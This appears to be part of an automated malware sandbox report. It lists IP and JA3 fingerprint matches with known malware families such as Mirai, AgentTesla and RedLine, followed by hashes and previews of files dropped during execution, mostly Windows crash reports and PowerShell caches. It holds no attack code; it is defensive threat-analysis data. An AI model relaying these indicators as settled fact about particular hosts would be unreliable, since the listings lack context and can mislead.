	KBGC_1200O000000_98756.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	154.216.20.22
	https://akbb.kampanyakrediiislemleri.com/	Get hash	malicious	Unknown	Browse	154.216.20.140
	mpsl.elf	Get hash	malicious	Mirai	Browse	156.254.70.160
	ppc.elf	Get hash	malicious	Mirai	Browse	156.254.70.191

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	SC.cmd	Get hash	malicious	Unknown	Browse	195.201.57.90
	file.exe	Get hash	malicious	Credential Flusher	Browse	195.201.57.90
	QUOTATIONS#08670.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	195.201.57.90
	1.cmd	Get hash	malicious	Unknown	Browse	195.201.57.90
	2.cmd	Get hash	malicious	Unknown	Browse	195.201.57.90
	download_2.exe	Get hash	malicious	Quasar	Browse	195.201.57.90
	PVUfopbGfc.exe	Get hash	malicious	LummaC	Browse	195.201.57.90
	gp4uQBDTP8.exe	Get hash	malicious	Xehook Stealer	Browse	195.201.57.90
	dNNMgwxY4f.exe	Get hash	malicious	Xehook Stealer	Browse	195.201.57.90
	tYeFOUhVLd.exe	Get hash	malicious	RedLine	Browse	195.201.57.90

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_4b8d65543863c75899b0bf72ba836e70e19edff4_e3b0f337_15db468f-fd21-4114-bf3d-c1f16af8e730\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.508847938127399
Encrypted:	false
SSDEEP:	192:XTzGXmG78Pd0eLDkja1TyLwMl9ulg6zuiFqZ24lO8n:fGWG78WeLDkjOTVS98g6zuiFqY4lO8n
MD5:	4391ED1E5A19340B6630348F5C11D0D4
SHA1:	D55AE9ED394CA581A5E049A27591A0507FCCD723
SHA-256:	19082D92B2DD2D7E97066E9E5F0862339D8047F73D08588FF760F1A4FD4A2922
SHA-512:	DFED3999C7495053560FC699D47D4A267F98E0F27A8A1D375480AD90E55A971EF1CABC5D9032811153AD02AFD61C67C77238BCE2B9A5BB58AF56AF26C082487E
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.4.3.3.7.0.5.7.4.7.6.0.3.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.4.3.3.7.0.6.6.2.2.5.9.7.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.5.d.b.4.6.8.f.-.f.d.2.1.-.4.1.1.4.-.b.f.3.d.-.c.1.f.1.6.a.f.8.e.7.3.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.3.7.e.4.5.c.2.-.0.5.7.a.-.4.e.3.5.-.b.d.4.2.-.7.b.2.f.f.2.b.2.0.a.1.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.8.-.0.0.0.1.-.0.0.1.4.-.f.f.d.6.-.4.d.7.4.9.3.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_4b8d65543863c75899b0bf72ba836e70e19edff4_e3b0f337_524291a7-4586-471e-9996-599bcf79e603\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.5092902310167633
Encrypted:	false
SSDEEP:	192:HIj8mGW8Pd0eLDkja1TyeNRJlxlg6zuiFqZ24lO8n:07GW8WeLDkjOTZRrTg6zuiFqY4lO8n
MD5:	F7789864FEB5A22E4070C43B570CC520
SHA1:	4032F472ADCC7D8C674BE02C005971E62CFD75EA
SHA-256:	003EDA9EEBB4444F56BD005239A40200DFC9B9CD49B84F91E6E9DF2CD51FF2AF
SHA-512:	37216761C6C5FAAFC4AC24AD1720764954CB9BB268222EFF416F11B6EB1E8644FB868BA37862C79DCB69F8C9FF80B7C70FB9548BA6374DE5019B7A1CB1867FA1
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.4.3.3.6.5.4.0.0.7.9.7.1.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.4.3.3.6.5.4.9.1.4.2.2.5.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.2.4.2.9.1.a.7.-.4.5.8.6.-.4.7.1.e.-.9.9.9.6.-.5.9.9.b.c.f.7.9.e.6.0.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.8.b.3.d.a.a.1.-.6.e.4.f.-.4.3.1.2.-.8.6.8.b.-.2.5.5.f.1.0.4.9.2.1.1.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.2.8.-.0.0.0.1.-.0.0.1.4.-.2.7.5.5.-.f.4.5.4.9.3.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER978A.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Oct 3 12:55:06 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	903756
Entropy (8bit):	3.493826044003654
Encrypted:	false
SSDEEP:	6144:fihBnsP1BxWFtGb/zxSLBKqXGk5HeBd2PsuEFqR3QA1z:fijtGb/zxSLccABd2PsukqFQQ
MD5:	CBC6FAC040DAA4BF3221E1557FD51EA9
SHA1:	AB16490964FC63275B84ADA8FD4472FB539B0CBE
SHA-256:	BC520673455786E0F5F95D49A52EF252C7811D2929BA26F2F399B774B7864A8A
SHA-512:	2BFE989F54DB8350186E3598AE5C308DEE17A7F4ED126FF7DA12E042DF3682F820868DDA804E295F2B7B8FABFEE4DB2D6693AA2389DD8498A3ACEC44924C7061
Malicious:	false
Preview:	MDMP..a..... .......*..f............$............'..8........5...2..........,...........`.......8...........T............]..Tl..........ph..........\j..............................................................................eJ.......j......Lw......................T...........#..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER999F.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8586
Entropy (8bit):	3.696039447137576
Encrypted:	false
SSDEEP:	192:R6l7wVeJPMd6Yp5cgmfZaPNpWEp89bZZ1fiHTm:R6lXJEd6Y3cgmfQPyZLfiq
MD5:	12FD5EF54D3BB05428D4EB262A818F40
SHA1:	1804E29BA4AAAE9D15870F6DB8D315B032EFCC9C
SHA-256:	CFAA90AD5F81A54CBE79D1E3B448C450906BB7BE25CE747A2208DB1CEAD51A68
SHA-512:	00E7DE8C676520700F0F859B4D2BDBC08A54A5508531BA4245A08E8D72FC27CD3E2684ABD36EADFCB66BDE3277BD65537BFBE5C468124CB483E2A8B0ECE5CB59
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER99EE.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4777
Entropy (8bit):	4.440872292582251
Encrypted:	false
SSDEEP:	48:cvIwWl8zseXPJg771I9VKWpW8VYtYm8M4JQ9AHVSFsyq8vlAHVAytf2id:uIjfgI7er7VpJQ0VbWMVAuf2id
MD5:	4C5E76FD920D5A99F0742F8CDAE221EA
SHA1:	A587221176804BF4DDF156844CF9A0E1F772BC81
SHA-256:	5CCFE39C00CE9C5354566EEE3680E4BC22B057768AD24718A9699EEF66E7ACF2
SHA-512:	0F645A19E1908CBB32237C51C4A461A8C799C227287D501E5AE7D4F2D4A385E14DA2556F03E48CEFFEAAEB86B33612C96D2630984A606FC4E9D43485DFC6BDFA
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="527277" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD55.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Oct 3 12:54:14 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	900453
Entropy (8bit):	3.4878249338619844
Encrypted:	false
SSDEEP:	6144:TkaDyOnLcxBuDAZc7wqdkRIzxuolEq/fR2UvAAeGq++i3QpRvm:+SoKKc/kRAJHR2UvAANq+bQp
MD5:	9C9E5A4B5F5EC1803D075C818F4D5F58
SHA1:	D140E2A96FAB2410F3EF39A102F88C976509BB9C
SHA-256:	0B34AD5EC4050CEFCA2EEC14511A5F0AEAF67A2E5A901D0F9D0CAD56CC3EF235
SHA-512:	9FF5024678BAE2C3308EA68582B78EEDFC8859BE49320E34A773293F8D5201D3E8D66DD8367D92C9515D3CAB08C6C45BC825C2443B6F2CC8EFA65A44DFBC3006
Malicious:	false
Preview:	MDMP..a..... ..........f............$............'..8........5...2..........D...........`.......8...........T............]..._...........h..........tj..............................................................................eJ.......k......Lw......................T.......(.....f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCFF6.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8778
Entropy (8bit):	3.6979020144065333
Encrypted:	false
SSDEEP:	192:R6l7wVeJ66z6YYDmwgmfZaPNpWEu89bL5UfjD5m:R6lXJfz6YSmwgmfQPTLafk
MD5:	569CEC5C2B5660BCFC384A1C04FB91FD
SHA1:	461C2205C0B94C65C7653EFEE2D2A9B296D1EAFD
SHA-256:	C37BAFBC237122E1D18AECCF420BCC0C6032071DBAC78CD09137F64760A51068
SHA-512:	4E7F25493ED0DEF28D3458A89C1442515CDEEFBB8D38B088B339EFD9319588356DAB6706986EE9CEC7C50C3DA4DB9C37F35053A0574EBBF59B7D56D529158EAC
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.2.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD054.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4777
Entropy (8bit):	4.442746673001936
Encrypted:	false
SSDEEP:	48:cvIwWl8zseXgJg771I9VKWpW8VYsNYm8M4JQ9AHVSFpyq8vlAHVEsytfkd:uIjfbI7er7V2JQ0VWWMVEsufkd
MD5:	CA10CF4267EA920B6382F5F57DBECA1C
SHA1:	4A67A7CFED178A08BA9D85B5EF79547EB47F3C98
SHA-256:	B6123548BD794739EE3BED74F3B4248E38992DB5F9743E380B2AEDFA7A696FDB
SHA-512:	CE54F8313EEFAB091FF7F68BB521A3A6E22E28CCE7B5C3C0ED266688D270A10C8DBBC5D69B20AB9FFE725FB50B78B66687F533F5425CBED8ED65317AEA31727A
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="527276" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.150184159866505
Encrypted:	false
SSDEEP:	6:kKyZi9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:KvDnLNkPlE99SNxAhUe/3
MD5:	6D2DD7670E6C6E13098A62A173040B90
SHA1:	2D3780590D9A7A69945646EFD25E816F89A9B312
SHA-256:	FE76AFC2A65F4926A80E430971D20FAC05E5A28A1B3A0230D4948FBC9736A3EF
SHA-512:	3CA40528A4A10B47A6C6A1486F7648750C0352ECC01D782F465A1AE8F234B8BDE22E98AEDE452242407D508CDEF1B3C424289716C704CE863ADAA72FD73DF911
Malicious:	false
Preview:	p...... ...............(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	9713
Entropy (8bit):	4.940954773740904
Encrypted:	false
SSDEEP:	192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
MD5:	BA7C69EBE30EC7DA697D2772E36A746D
SHA1:	DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
SHA-256:	CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
SHA-512:	E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2916
Entropy (8bit):	5.377699439087756
Encrypted:	false
SSDEEP:	48:4t1AzsSU4YymI4RIoUeCa+m9qr9t5/78NfpHQDGxJZaxIZVEouNHJBVrH/jCB:IAzlHYvIIfLz9qrh7KfpRJlPEo2dL8
MD5:	8CA36DE9B60A2DD57F287DE38180228E
SHA1:	376C5188B514F8DE60DB1034E1A85095A7003BB5
SHA-256:	E2AC2D8BA3AF5D117EE85FD3AB86E6F7A5EA5831ADCB50A0AF443DCC365AA7AB
SHA-512:	E3DD1EE96FF77EEDCD24E612936723CA34A28C035DAA88D21814A15C6EC71C6E4C98EA161C0A366D4C8CA9F5D672244F5A6C387E2D9847E9E04211ADD84528B7
Malicious:	false
Preview:	@...e...........................................................H..............@-....f.J.\|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_agdswqj5.see.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g551fzbs.jsj.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j4fx5gc4.luo.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lbl2amhi.n5x.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mjrvekz5.vno.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
